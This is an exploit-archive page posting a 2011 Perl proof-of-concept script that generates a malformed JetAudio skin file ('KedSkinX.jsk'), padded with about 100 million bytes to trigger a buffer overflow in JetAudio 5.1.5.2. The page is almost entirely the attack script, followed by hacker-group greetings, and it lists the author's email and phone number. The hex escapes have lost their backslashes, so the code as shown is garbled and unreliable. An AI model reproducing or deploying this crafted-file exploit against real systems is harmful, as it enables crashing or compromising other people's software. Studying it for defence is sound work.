Home / exploitsPDF  

JetAudio Skins 5.1.5.2 Buffer Overflow

Posted on 26 February 2011

#!/usr/bin/perl ### # Title : JetAudio 'Skins' V<=5.1.5.2 Buffer Overflow # Author : KedAns-Dz # E-mail : ked-h@hotmail.com # Home : HMD/AM (30008/04300) - Algeria -(00213555248701) # Twitter page : twitter.com/kedans # Tested on : windows XP SP3 Français & Arabic # Target : JetAudio Version 5.1.5.2602 ### # Note : This Exploit BOF is Special Greets to Member ' Overfolw ' From sec4ever.com #START SYSTEM /root@MSdos/ : system("title KedAns-Dz"); system("color 1e"); system("cls"); print " ". " ||========================================|| ". " || || ". " || JetAudio 'Skins' V <= 5.1.5.2 || ". " || Exploit Buffer Overflow || ". " || Created BY KedAns-Dz || ". " || ked-h(at)hotmail(dot)com || ". " || || ". " ||========================================|| "; sleep(2); print " "; print " [!] Please Wait Till c0de Generate... "; my $ked = "x41" x 100000000 ; # Integer Overflow my $Buf = "xd0xcfx11xe0xa1xb1xa1xe1x00x00x00x00x00x00x00x00". # Skin index "x00x00x00x00x00x00x00x00x3ex00x03x00xfexffx00x00x00". "$ked"; # end Skin index $file = "KedSkinX.jsk"; # Evil File ( Jet.SKin) open (F ,">$file"); print F $Buf; sleep (2); print " [+] Creat File : $file , Succesfully ! "; close (F); #================[ Exploited By KedAns-Dz * HST-Dz * ]========================= # GreetZ to : Islampard * Dr.Ride * Zaki.Eng * BadR0 * NoRo FouinY * Red1One # XoreR * Mr.Dak007 * Hani * TOnyXED * Fox-Dz * Massinhou-Dz ++ all my friends ; # > Algerians < [D] HaCkerS-StreeT-Team [Z] > Hackers < # My Friends on Facebook : Nayla Festa * Dz_GadlOl * MatmouR13 ...all Others # 4nahdha.com : TitO (Dr.Ride) * MEN_dz * Mr.LAK (Administrator) * all members ... # sec4ever.com members Dz : =>> # Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz ... all Others # hotturks.org : TeX * KadaVra ... all Others # Kelvin.Xgr ( kelvinx.net) #===========================================================================

 

TOP